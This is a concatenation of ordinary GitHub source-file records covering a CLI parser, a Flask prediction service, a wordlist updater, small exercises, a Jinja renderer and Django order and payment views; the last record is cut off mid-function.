pass\n\nclass CmdArgumentParser(CommandArgumentParser):\n logger = get_logger('CmdArgumentParser')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def get_completions_after_argument(self, word_for_completion):\n \"\"\"\n Get the list of words for completion\n :param word_for_completion: the word to complete\n \"\"\"\n return []\n\n def get_completions_after_cmd(self, argument, words=None):\n \"\"\"Get the word list used for completion\"\"\"\n res = []\n if words and isinstance(words, list):\n res.extend(words)\n args = self.get_arguments()\n for arg in args:\n if arg.is_cmd:\n continue\n # arguments that already have a value are not shown,\n # except for list arguments\n if arg.is_set and not arg.is_list:\n continue\n res.append(dict(text = '--' + arg.name, display_meta = arg.help))\n return res\n\n def parse_args(self, text):\n \"\"\"Parse the arguments\"\"\"\n args = super().parse_args(text)\n arg_list = self.get_arguments()\n for arg in arg_list:\n log_text = f'{self.cmd} argument {arg.name}' \\\n f' {getattr(args, arg.name.replace(\"-\", \"_\"))}'\n self.logger.info(log_text)\n return args\n\n def _print(self, text):\n tokens = list(pygments.lex(text, lexer=PythonLexer()))\n print_formatted_text(PygmentsTokens(tokens), end='')\n\n def run(self, text):\n func_name = f'run_{RUN_MODE.mode}'\n try:\n func = getattr(self, func_name)\n except:\n return\n\n func(text)\n","repo_name":"wxnacy/goss","sub_path":"goss/argument/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7393210836","text":"\"\"\"\npydockerutils\n-------------------------------\n - Eugenio Marinetto\n - nenetto@gmail.com\n-------------------------------\n\"\"\"\n\nfrom setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\nimport sys\n\n\nhere = path.abspath(path.dirname(__file__))\n\n# PRE INSTALL COMMANDS COMES HERE\nsys.path.append(here)\n\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name='pydockerutils',\n version='1.0',\n description='Installer scripts for Docker containers',\n long_description=long_description,\n 
url='https://github.com/nenetto/pydockerutils',\n author='Eugenio Marinetto',\n author_email='nenetto@gmail.com',\n packages=find_packages(exclude=(\"tests\",)),\n install_requires=['setuptools>=39.1.0',\n 'tabulate>=0.8.2'],\n include_package_data=True,\n package_data={'': ['forticlient/files/linux/forticlient.sh',\n 'forticlient/files/linux/forticlient_setup',\n 'forticlient/files/linux/connect_vpn.sh'\n ]\n },\n entry_points={'console_scripts': ['install_forticlient = pydockerutils.forticlient.forticlient_install:install',\n 'install_pyodbc = pydockerutils.mssql.mssql_install:install']}\n )\n","repo_name":"nenetto/pydockerutils-ferrovial","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12461176147","text":"from flask import Flask, request, jsonify, render_template\n\nimport joblib\nimport numpy\n\napp = Flask(__name__)\n\n\nfrom datetime import datetime\nfrom datetime import date\ndef calculate_age(start,end):\n start = datetime.strptime(start, \"%Y-%m-%d\").date()\n end = datetime.strptime(end, \"%Y-%m-%d\").date()\n return end.year - start.year - ((end.month, end.day) < (start.month, start.day))\n\ndef calculate_diff_date(start,end):\n print(\"start in calculate diff\",start)\n print(\"end in calculate diff\",end)\n start = datetime.strptime(start, \"%Y-%m-%d\").date()\n end = datetime.strptime(end, \"%Y-%m-%d\").date()\n return (end - start).days\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n # Check if request has a JSON content\n if request.json:\n # Get the JSON as dictionnary\n req = request.get_json()\n # Check mandatory key\n if \"input\" in req.keys():\n # Load model\n classifier = joblib.load(\"lr.joblib\")\n scaler = joblib.load(\"sc_x.joblib\")\n # Predict\n print(\"befor numpy\",req[\"input\"])\n data= req[\"input\"]\n print(\"dattatata\",data[0])\n #df1['funding_day'] = (df1['first_funding_at'] - df1['founded_at'])/np.timedelta64(1,'D')\n #df1['funding_range_1_2'] = (df1['last_funding_at'] - df1['first_funding_at'])/np.timedelta64(1,'D')\n \n ####requests\n #in =>df4[[\"funding_total_usd\", \"funding_rounds\", \"founded_at\", \"first_funding_at\", \"last_funding_at\"]]\n #out =>df4[[\"funding_total_usd\", \"funding_rounds\", \"company_age\", \"funding_day\", \"funding_range_1_2\"]]\n for i in data:\n print(\"i\",i)\n #geting the values of inputs \n founded_at= str(i[2])\n first_funding_at=str(i[3])\n last_funding_at= str(i[4])\n i[2]=calculate_age(founded_at,str(date.today()))\n #print(f\"i[2] after =====>{i[2]}<======\")\n first_funding_at=i[3]\n i[3]=calculate_diff_date(founded_at,first_funding_at)\n i[4]=calculate_diff_date(first_funding_at,last_funding_at) \n \n \n X=scaler.transform(data)\n print(\"x\",X) \n prediction = classifier.predict(X)\n # Return the result as JSON but first we need to transform the\n # result so as to be serializable by jsonify()\n prediction = str(prediction).replace(\" \",\",\")\n #print(prediction)\n return jsonify({\"predict\": prediction}), 200\n return jsonify({\"msg\": \"Error: not a JSON or no input key in your request\"})\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')","repo_name":"huynam1012/Projets-Jedha","sub_path":"Bloc 6_Projet 
Start-up/AppStartup/myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15774231220","text":"from utils.HttpUtil import HttpUtil\nfrom utils.ColorUtil import ColorUtil\nfrom utils.FileUtil import FileUtil\nimport requests\nimport sys\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n# Disable insecure request warnings\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nclass Update:\n def __init__(self,config):\n # directory where results are saved\n self.save_dir = \"result\"\n self.config = config\n self.conf = config.config\n # Headers for the size-probe request; 'identity' encoding avoids gzip\n # making Content-Length differ from the actual content size.\n self.headHeader = {\n \"User-Agent\": HttpUtil.getRandUA(),\n \"Accept-Encoding\": \"identity\"\n }\n self.header = {\n \"User-Agent\": HttpUtil.getRandUA(),\n }\n\n def getFileSize(self,url,proxy=\"\"):\n if proxy == \"\":\n try:\n rep = requests.get(url,headers=self.headHeader,verify=False)\n except requests.exceptions.ConnectionError as e:\n print(ColorUtil.Error(url + \" Need Proxy\"))\n return False\n else:\n rep = requests.get(url, headers=self.headHeader,proxies=proxy,verify=False)\n return rep.headers.get(\"Content-Length\")\n\n\n def getProxy(self):\n if \"proxy\" in self.conf and self.conf[\"proxy\"][\"http\"] != \"\" and self.conf[\"proxy\"][\"https\"]!=\"\":\n return self.conf[\"proxy\"]\n else:\n print(ColorUtil.Warn(\"No Set Proxy!\"))\n return \"\"\n\n def download(self,url,proxy=\"\"):\n print(ColorUtil.Info(\"Downloading: %s\"%url))\n\n if proxy == \"\":\n content_len = self.getFileSize(url)\n if content_len == False:\n return False\n rep = requests.get(url,headers=self.header,verify=False,stream=True)\n else:\n content_len = self.getFileSize(url,proxy)\n if content_len == False:\n return False\n\n rep = requests.get(url,headers=self.header,proxies=proxy,verify=False,stream=True)\n # progress bar\n\n temp_size = 0 # bytes downloaded so far\n chunk_size = 128 # bytes to read per chunk\n total_size = int(content_len)\n result = \"\" # accumulates the final data\n # progress bar\n\n result = self.processBar(rep,content_len)\n print()\n # first deduplication\n temp = result.split(b\"\\n\")\n # print(ColorUtil.Info(\"Before first dedup: %d\"%len(temp)))\n temp = list(set(result.split(b\"\\n\")))\n # print(ColorUtil.Info(\"After first dedup: %d\"%len(temp)))\n return temp\n\n def processBar(self,rep,content_len):\n temp_size = 0 # bytes downloaded so far\n chunk_size = 1024 # bytes to read per chunk\n total_size = int(content_len)\n result = b\"\" # accumulates the final data\n # progress bar\n for chunk in rep.iter_content(chunk_size=chunk_size):\n if chunk:\n temp_size += len(chunk)\n try:\n result += chunk\n except UnicodeDecodeError as e:\n continue\n ############# fancy download progress bar #############\n done = int(50 * temp_size / total_size)\n\n sys.stdout.write(\"\\r[\\033[1;34mINFO\\033[0m] \\033[1;32m[%s%s] %d%% %0.2fM\\033[0m\" % (\n '#' * done, ' ' * (50 - done), 100 * temp_size / total_size, temp_size / 1024 / 1024))\n sys.stdout.flush()\n return result\n def save(self,filename,content):\n\n if len(content) != 0:\n # second deduplication\n print(ColorUtil.Info(\"Before dedup: %d\" % len(content)))\n result = list(set(content))\n print(ColorUtil.Info(\"After dedup: %d\" % len(result)))\n # save the file\n path = FileUtil.getProjectPath() + FileUtil.getFileSep() + self.save_dir + FileUtil.getFileSep()\n absolute_path = path + filename + \".txt\"\n\n if FileUtil.isFileExist(absolute_path) == False:\n FileUtil.createDirFile(absolute_path)\n f = open(absolute_path,\"wb\")\n\n # write the deduplicated lines\n f.write(b\"\\n\".join(result))\n f.close()\n\n\n\n def update(self,type=\"\"):\n proxy = self.getProxy()\n blacklist = self.conf[\"blacklist\"]\n\n if type != \"\":\n if type in blacklist or type not in self.conf:\n print(ColorUtil.Error(\"No Type %s\"%type))\n return\n result = []\n if len(self.conf[type]) == 0:\n print(ColorUtil.Error(\"Config(%s) is Empty!\"%type))\n return\n print(ColorUtil.InfoBlue(\"=========Type:%s=========\" % type))\n for url in self.conf[type]:\n # local file\n if not url.startswith(\"http://\") and not url.startswith(\"https://\"):\n if FileUtil.isFileExist(url):\n\n print(ColorUtil.Info(\"Reading: %s\" % url))\n result += open(url, \"rb\").readlines()\n else:\n print(ColorUtil.Error(\"No Path %s\" % url))\n else: # URL\n temp = self.download(url, proxy)\n if temp == False:\n continue\n result += temp\n self.save(type, result)\n else:\n\n for key in self.conf:\n result = []\n if len(self.conf[key]) == 0:\n print(ColorUtil.Error(\"Config(%s) is Empty!\"%key))\n continue\n # skip keys that are on the blacklist\n if key in blacklist:\n continue\n print(ColorUtil.InfoBlue(\"=========Type:%s=========\" % key))\n # update each source in turn\n for url in self.conf[key]:\n # local file\n if not url.startswith(\"http://\") and not url.startswith(\"https://\"):\n if FileUtil.isFileExist(url):\n print(ColorUtil.Info(\"Reading: %s\"%url))\n result += open(url,\"rb\").readlines()\n else:\n print(ColorUtil.Error(\"No Path %s\"%url))\n else: # URL\n temp = self.download(url, proxy)\n if temp == False:\n continue\n result += temp\n\n self.save(key, result)","repo_name":"Vicl1fe/PeneD","sub_path":"lib/Update.py","file_name":"Update.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1694510286","text":"data_tuple = ('h', 6.13, 'C', 'e', 'T', True, 'k', 'e', 3, 'e', 1, 'g')\nletters, numbers = [], []\n\nfor i in data_tuple:\n if type(i) == str:\n letters.append(i)\n else:\n numbers.append(i)\nletters.append(numbers[1])\nletters.reverse()\nletters.remove(\"g\")\nletters.remove(\"C\")\nletters.insert(1, \"G\")\nletters.insert(7, \"c\")\nletters = tuple(letters)\nprint(letters)\n\ndel numbers[:2]\nnumbers.insert(1, 2)\nnumbers.sort()\nnumbers = [i ** 2 for i in numbers]\nnumbers = 
tuple(numbers)\nprint(numbers)\n","repo_name":"Ruslan321532/py4","sub_path":"Ruslan_29-1_hw4.py","file_name":"Ruslan_29-1_hw4.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5937920837","text":"#Write a function that takes a string of braces, and determines if the order of the braces is valid. It should return true if the string is valid, and false if it's invalid.\n\ndef validBraces(string):\n braces = []\n open = [\"{\",\"[\",\"(\"]\n close = [\"}\",\"]\",\")\"]\n for i in string:\n if i in open:\n braces.append(i)\n elif i in close:\n pos = close.index(i)\n if ((len(braces) > 0) and (open[pos] == braces[len(braces)-1])):\n braces.pop()\n if len(braces) == 0:\n return True\n else:\n return False","repo_name":"justin-xing/CodeWars","sub_path":"ValidBraces.py","file_name":"ValidBraces.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27309101962","text":"from jinja2 import Environment, FileSystemLoader\nimport os\nfrom babel.support import Translations, NullTranslations\nimport datetime\nimport json\n\ndef to_json_support_datetime(value, format=\"%Y-%m-%d\", format_datetime = \"%Y-%m-%d %H:%M:%S\"):\n def update_datetime(obj):\n if isinstance(obj, dict):\n for k, v in obj.items():\n obj[k] = update_datetime(v)\n elif isinstance(obj, list):\n for i, v in enumerate(obj):\n obj[i] = update_datetime(v)\n elif isinstance(obj, tuple):\n obj = tuple(update_datetime(v) for v in obj)\n elif isinstance(obj, datetime.date):\n return obj.strftime(format)\n elif isinstance(obj, datetime.datetime):\n return obj.strftime(format_datetime)\n return obj\n return json.dumps(update_datetime(value), ensure_ascii=False)\n\nclass Renderer:\n def __init__(self, template_name, search_paths, log, html_templates_i18n_dirs = [], locale = None):\n '''\n @template_name e.g. 
\"base.html\"\n @search_paths list type, start elements has high priority\n '''\n self.log = log\n self.env = None\n if html_templates_i18n_dirs:\n if not locale:\n locale = \"en\"\n translations_merge = Translations.load(html_templates_i18n_dirs[0], [locale])\n if type(translations_merge) != NullTranslations:\n for dir in html_templates_i18n_dirs[1:]:\n translations = Translations.load(dir, [locale])\n if type(translations) != NullTranslations:\n translations_merge.merge(translations)\n self.env = Environment(\n extensions=['jinja2.ext.i18n'],\n loader=FileSystemLoader(search_paths)\n )\n self.env.filters[\"tojson2\"] = to_json_support_datetime\n self.env.install_gettext_translations(translations_merge)\n if not self.env:\n self.env = Environment(\n loader=FileSystemLoader(search_paths)\n )\n self.template = template_name\n\n def render(self, **kw_args):\n try:\n template = self.env.get_template(self.template)\n html = template.render(**kw_args)\n except Exception as e:\n self.log.e(\"render with template {} fail\".format(self.template))\n raise e\n return html\n\n\n","repo_name":"teedoc/teedoc","sub_path":"teedoc/html_renderer.py","file_name":"html_renderer.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"53"} +{"seq_id":"9651667524","text":"\n\nclass Node:\n def __init__(self, value: str):\n self.value = value\n self.left = None\n self.right = None\n\n def add_value(self, value: str, children: list) -> bool:\n if self.left == None:\n node = Node(value)\n children.append(node)\n self.left = node\n return True\n\n elif self.right == None:\n node = Node(value)\n children.append(node)\n self.right = node\n return True\n\n else:\n return False\n \n\n def get_children(self) -> tuple:\n return self.left, self.right\n \n def set_children(self, children: tuple):\n self.left = children[0]\n self.right = children[1]\n \n \n def __str__(self):\n return f'value: {self.value}, left: {self.left.value if type(self.left) is Node else None}, right: {self.right.value if type(self.right) is Node else None}'\n\n\n\n\n\ndef construct_tree(data: str) -> Node:\n\n top_node = Node(data[0])\n \n children = [top_node]\n\n for char in data[1:]:\n full_children = []\n for child in children:\n if child.add_value(char, children):\n break\n else:\n full_children.append(child)\n\n for child in full_children:\n children.remove(child)\n\n return top_node\n\ndef tree_to_string(first_node: Node) -> str:\n\n chars = [first_node.value]\n nodes = [first_node.left, first_node.right]\n children = []\n\n while nodes != []:\n for node in nodes:\n if node != None:\n chars.append(node.value)\n children.append(node.left)\n children.append(node.right)\n\n nodes = children\n children = []\n\n return ''.join(chars)\n \n \ndef swap_nodes(node: Node) -> Node:\n \n\n if node == None:\n return None\n \n if node.left == None or node.right == None:\n node.left, node.right = node.right, node.left\n return node\n else:\n\n leftc = node.left.get_children() if node.left != None else (None, None)\n rightc = node.right.get_children() if node.right != None else (None, None)\n\n node.left.set_children(rightc)\n node.right.set_children(leftc)\n\n node.left, node.right = swap_nodes(node.right), swap_nodes(node.left)\n \n\n return node\n \n\n\n\n\n# tree = construct_tree('hello there jiggy')\n# tree = swap_nodes(tree)\n# tree = swap_nodes(tree)\n\n# print 
(tree_to_string(tree))\n\n","repo_name":"spawncreeper2006/NewJigsCode","sub_path":"encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38114285893","text":"\n# coding: utf-8\n\n# # My First Data Cube\n# \n# A small notebook showing how to initialise connection and access the Data Cube a display a small section of data\n\n# In[1]:\n\n#get_ipython().magic(u'pylab')\n#%pylab inline\n#import mpld3; mpld3.enable_notebook() \n\n\n# In[2]:\n\nfrom datetime import datetime, date, timedelta\nfrom gdf import GDF\nfrom pprint import pprint\nimport matplotlib.pyplot as plt\n\n\n# In[3]:\n\ndef plotImages(arrays):\n img = arrays\n num_t = img.shape[0]\n num_rowcol = math.ceil(math.sqrt(num_t))\n fig = plt.figure()\n fig.clf()\n plot_count = 1\n for i in range(img.shape[0]):\n data = img[i]\n ax = fig.add_subplot(num_rowcol,num_rowcol,plot_count)\n plt.setp(ax, xticks=[], yticks=[])\n #cax = ax.imshow(data, interpolation='nearest', aspect = 'equal')\n cax = ax.pcolormesh(data) #, interpolation='nearest', aspect = 'equal')\n #fig.colorbar(cax)\n plot_count += 1\n fig.tight_layout()\n plt.show()\n\n\n# In[4]:\n\ng = GDF()\n#g.debug = True\n\n\n# In[5]:\n\ndata_request_descriptor = {'storage_type': 'LS7ETM',\n 'variables': ('B30', 'B40'),\n 'dimensions': {'X': {'range': (140.0, 140.125)},\n 'Y': {'range': (-35.0, -35.0+0.125)},\n #'T': {'range': (0, 6325376000),\n # 'array_range': (0, 4)\n #'crs': 'SSE', # Seconds since epoch\n #'grouping_function': g.null_grouping\n # }\n }\n }\n\n\n# In[6]:\n\nd = g.get_data(data_request_descriptor)\npprint(d)\nprint(d['arrays']['B30'].shape)\n\n\n\n# In[7]:\nplotImages(d['arrays']['B30'])\n\n\n# In[ ]:\n\ntype(d['arrays']['B30'])\n\n\n\n\n# In[ ]:\n\n\n\n","repo_name":"woodcockr/agdc-v2-examples","sub_path":"MyFirstDataCube.py","file_name":"MyFirstDataCube.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22098959327","text":"import numpy as np\nimport matplotlib.pyplot as plt\n#\n\ndef normal_dist(points, mean, variance, scale): # x wektor warotsic , srednia, variancja\n \n indices = np.linspace(0, points, points)\n density = (1/(2*np.pi*variance**2) ) * np.exp(-0.5*((indices-mean)/variance)**2)\n m = max(density)\n for i in range(240):\n density[i] /= m\n density[i] *= scale\n \n return density\n\n\nf0 = normal_dist(240, 120, 30, 0.7)\nf1 = normal_dist(240, 100, 45, 0.2)\nf2 = normal_dist(240, 140, 60, 0.1)\n\n\n\n# pdf = normal_dist(240, 10, 0.5)\n \n# plt.plot([index for index in range(240)],f0 , color = 'red')\n# plt.plot([index for index in range(240)],f1 , color = 'green')\n# plt.plot([index for index in range(240)],f2 , color = 'blue')\n\n# plt.show()\n\n\n\n\n\n# plt.plot(bins, ,\n# linewidth=2, color='r')\n# plt.show()","repo_name":"ErnestSzczepaniak/game","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37276697905","text":"\nfrom django.http import JsonResponse\nfrom django.utils import timezone\nfrom datetime import timedelta\nimport requests\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.contrib.auth import get_user_model\nfrom store.models import Order, AccountType, Platform, PaymentMethod, Coupon, 
Transaction, PaymentDetails\nfrom users.models import Currency\nfrom django.shortcuts import redirect\nfrom .serializers import TransactionSerializer, OrderSerializer, AccountTypeSerializer, PlatformSerializer, \\\n PaymentMethodSerializer, PaymentDetailsSerializer, OrdersListSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\nfrom django.contrib import messages\n\nfrom users.models import CustomUser\nfrom rest_framework import serializers\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\nfrom rest_framework import generics\nfrom rest_framework import status\nfrom .models import Order\nfrom django.core.files.base import ContentFile\nimport base64\nfrom django.http import Http404\nfrom django.conf import settings \n\n\nUser = get_user_model()\nfrom rest_framework.generics import get_object_or_404\n\nclass TransactionList(APIView):\n permission_classes = [IsAuthenticated]\n \n def get(self, request):\n transactions = Transaction.objects.filter(user=request.user).order_by('-created_at')[:3]\n serializer = TransactionSerializer(transactions, many=True)\n return Response(serializer.data)\n\n\nclass CustomUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = CustomUser\n fields = ['id', 'username', 'email', 'first_name', 'last_name'] \n\n\nclass UserDetails(APIView):\n permission_classes = [IsAuthenticated]\n \n def get(self, request): \n user = get_object_or_404(User, id=request.user.id)\n user_serializer = CustomUserSerializer(user)\n return Response({'user': user_serializer.data})\n\n\n\nclass OrdersHistoryList(APIView):\n permission_classes = [IsAuthenticated]\n \n def get(self, request):\n orders = Order.objects.filter(user=request.user).order_by('-created_at')[:3]\n serializer = OrdersListSerializer(orders, many=True) \n return Response(serializer.data)\n\n\nclass OrderDetailView(APIView):\n permission_classes = [IsAuthenticated]\n\n def get(self, request, order_id):\n try:\n order = Order.objects.get(id=order_id)\n serializer = OrdersListSerializer(order)\n return Response(serializer.data)\n except Order.DoesNotExist:\n return Response({'error': 'Order not found'}, status=404)\n \n \n\nclass AccountTypeList(APIView): \n def get(self, request):\n account_types = AccountType.objects.all()\n serializer = AccountTypeSerializer(account_types, many=True)\n return Response(serializer.data)\n\n\nclass CheckAccountType(APIView):\n def get(self, request, path):\n try: \n account_type = AccountType.objects.get(amount=path)\n serializer = AccountTypeSerializer(account_type)\n return Response(serializer.data)\n except AccountType.DoesNotExist:\n return Response(\n {\"error\": \"Account type not found\"},\n status=status.HTTP_404_NOT_FOUND\n )\n\n\nclass PlatformsList(APIView): \n def get(self, request):\n platform = Platform.objects.all()\n serializer = PlatformSerializer(platform, many=True)\n return Response(serializer.data)\n\n\n\n\n\n\n\nclass CreateOrder(generics.CreateAPIView):\n queryset = Order.objects.all()\n serializer_class = OrderSerializer\n\n def create(self, request, *args, **kwargs):\n try:\n # Extract the amount and user id from the POST request data\n amount = request.data.get('amount').lower()\n user_id = request.data.get('user')\n paymentMethod = request.data.get('paymentMethod').lower()\n notes = request.data.get('notes')\n currency = request.data.get('currency') \n\n # Initialize serializers\n payment_details_serializer 
= None\n            transaction_serializer = None\n            order_serializer = None\n\n            # Try to get the PaymentMethod and AccountType objects\n            payment_method = get_object_or_404(PaymentMethod, name=paymentMethod)\n            account_type = get_object_or_404(AccountType, starting_balance=amount) \n            user_instance = CustomUser.objects.get(id=user_id)\n\n            print(\"user_instance\", user_instance.email)\n\n            # Create payment details data based on paymentMethod\n            if paymentMethod == 'bank-transfer':\n                payment_details_data = {'payment_proof': \"None\"} \n            elif paymentMethod == 'cryptocurrency':\n                payment_details_data = {'crypto_gateway': \"None\"} \n            elif paymentMethod == 'paystack':\n                payment_details_data = {'reference': \"None\"} \n            elif paymentMethod == 'card_type':\n                payment_details_data = {'payment_proof': \"None\"} \n            else:\n                return Response({'error': 'Unsupported payment method'}, status=status.HTTP_400_BAD_REQUEST)\n            \n            # Create PaymentDetailsSerializer\n            payment_details_serializer = PaymentDetailsSerializer(data=payment_details_data)\n\n            if payment_details_serializer.is_valid():\n                print(\"payment_details_serializer.is_valid():\")\n                payment_details = payment_details_serializer.save()\n\n                transaction_data = {\n                    'amount': account_type.setup_fee,\n                    'currency': currency,\n                    'payment_details': payment_details.id\n                } \n                transaction_serializer = TransactionSerializer(data=transaction_data)\n            else:\n                print(\"payment_details_serializer.errors\", payment_details_serializer.errors)\n                return Response(payment_details_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n            print(payment_details.id)\n\n            if transaction_serializer.is_valid():\n                print(\"transaction_serializer.is_valid():\")\n                transaction = transaction_serializer.save()\n\n                order_data = {\n                    'account_type': account_type.id,\n                    'amount': account_type.setup_fee,\n                    'user': user_id,\n                    'transaction': transaction.id,\n                    'payment_method': payment_method.id,\n                    'additional_notes': notes \n                }\n\n                # Create OrderSerializer\n                order_serializer = OrderSerializer(data=order_data)\n\n                if order_serializer.is_valid(): \n                    order = order_serializer.save() \n                    context = {\n                        'user': user_instance.email, 'amount': account_type.starting_balance,\n                        'payment_method': payment_method.name, 'setup_fee': account_type.setup_fee,\n                        'status': transaction.status \n                    }\n\n                    print(context)\n                    # Render the HTML email template\n                    email_subject = \"New Order Notification\"\n                    email_body = render_to_string('order/order_confirm.html', context)\n\n                    send_mail(\n                        email_subject,\n                        email_body,\n                        settings.DEFAULT_FROM_EMAIL,  # Sender's email address\n                        [order.user.email],  # Recipient's email address (user's email)\n                        fail_silently=False,  # Set to True to suppress exceptions if sending fails\n                        html_message=email_body,  # Set the HTML content here\n                    )\n\n                    # Render the same HTML email template for the admin notification\n                    email_subject_admin = \"@admin: New Order Notification\"\n                    email_body_admin = render_to_string('order/order_confirm.html', context)\n\n                    send_mail(\n                        email_subject_admin,\n                        email_body_admin,\n                        settings.DEFAULT_FROM_EMAIL,  # Sender's email address\n                        [settings.ADMIN_EMAILS],  # Recipient list (admin email addresses)\n                        fail_silently=False,  # Set to True to suppress exceptions if sending fails\n                        html_message=email_body_admin,  # Set the HTML content here\n                    )\n                    return Response(order_serializer.data, status=status.HTTP_201_CREATED)\n                else:\n                    # Roll back the already-saved rows so no orphaned payment/transaction records remain\n                    payment_details.delete()\n                    transaction.delete()\n                    print(\"order_serializer.errors\", order_serializer.errors)\n                    return Response(order_serializer.errors, status=status.HTTP_400_BAD_REQUEST) \n            else:\n                print(\"transaction_serializer.errors\", transaction_serializer.errors)\n
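                # Transaction data failed validation: surface the serializer errors as a 400 response.\n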
                return Response(transaction_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n        except Exception as e:\n            print(\"An error occurred in EXCEPT:\", str(e))\n            return Response({\"error\": \"An error occurred\"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\nimport os\nimport base64\nfrom datetime import timedelta\nfrom django.http import Http404, JsonResponse\nfrom django.utils import timezone\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Order, Coupon\nfrom .serializers import OrderSerializer\n\n\nclass PaymentProofUploadAPIView(APIView):\n    ALLOWED_EXTENSIONS = {'.png', '.jpg', '.jpeg', '.pdf'}\n\n    def post(self, request, order_id, format=None):\n        # Retrieve the Order object based on the orderId from the URL path;\n        # get_object_or_404 raises Http404 itself if the order is missing\n        order = get_object_or_404(Order, id=order_id)\n\n        # Check if a file was uploaded in the request\n        if 'file' not in request.FILES:\n            return Response({'error': 'No file uploaded'}, status=status.HTTP_400_BAD_REQUEST)\n\n        print(request.FILES)\n\n        uploaded_file = request.FILES['file']\n        file_name, file_extension = os.path.splitext(uploaded_file.name)\n        file_extension = file_extension.lower()\n\n        # Check if the file extension is allowed\n        if file_extension not in self.ALLOWED_EXTENSIONS:\n            return Response({'error': 'Invalid file type. Please upload a .png, .jpg, .jpeg, or .pdf file.'}, status=status.HTTP_400_BAD_REQUEST)\n\n        # Embed the file as a base64 data URI so it can be stored in a text field\n        file_content = uploaded_file.read()\n        encoded_file = base64.b64encode(file_content).decode('utf-8')\n        encoded_data = f\"data:{uploaded_file.content_type};base64,{encoded_file}\" \n\n        transaction = order.transaction\n        payment_details = transaction.payment_details\n        payment_details.payment_proof = encoded_data\n        payment_details.save()\n\n        # Serialize the updated Order object\n        serializer = OrdersListSerializer(order)\n        print(order.user.email)\n\n        # Render the HTML email template\n        # email_subject = \"Order Update Notification\"\n        # email_body = render_to_string('order/order_update.html', {'user': order.user, 'order': order})\n        # # print(email_body)\n\n        # send_mail(\n        #     email_subject,\n        #     email_body,\n        #     settings.DEFAULT_FROM_EMAIL,  # Sender's email address\n        #     [order.user.email],  # Recipient's email address (user's email)\n        #     fail_silently=False,  # Set to True to suppress exceptions if sending fails\n        #     html_message=email_body,  # Set the HTML content here\n        # )\n\n        # Render the HTML email template\n        email_subject_admin = \"@admin: Order update Notification\"\n        email_body_admin = render_to_string('order/order_update.html', {'user': order.user, 'order': order})\n\n        send_mail(\n            email_subject_admin,\n            email_body_admin,\n            settings.DEFAULT_FROM_EMAIL,  # Sender's email address\n            [settings.ADMIN_EMAILS],  # Recipient list (admin email addresses)\n            fail_silently=False,  # Set to True to suppress exceptions if sending fails\n            html_message=email_body_admin,  # Set the HTML content here\n        )\n\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n\ndef ValidateCoupon(request):\n    if request.method == 'POST':\n        # print(request.POST)\n        coupon_code = request.POST.get('coupon_code')\n        order_id = request.POST.get('order_id')\n\n        try:\n            coupon = Coupon.objects.get(code=coupon_code)\n        except Coupon.DoesNotExist:\n            return JsonResponse({'error': 'Invalid coupon code'})\n\n        if not coupon.is_valid():\n            return JsonResponse({'error': 'Coupon has expired'})\n
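        # Fetch the order and apply the percentage discount; the coupon is single-use and is expired right after it is applied.\n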
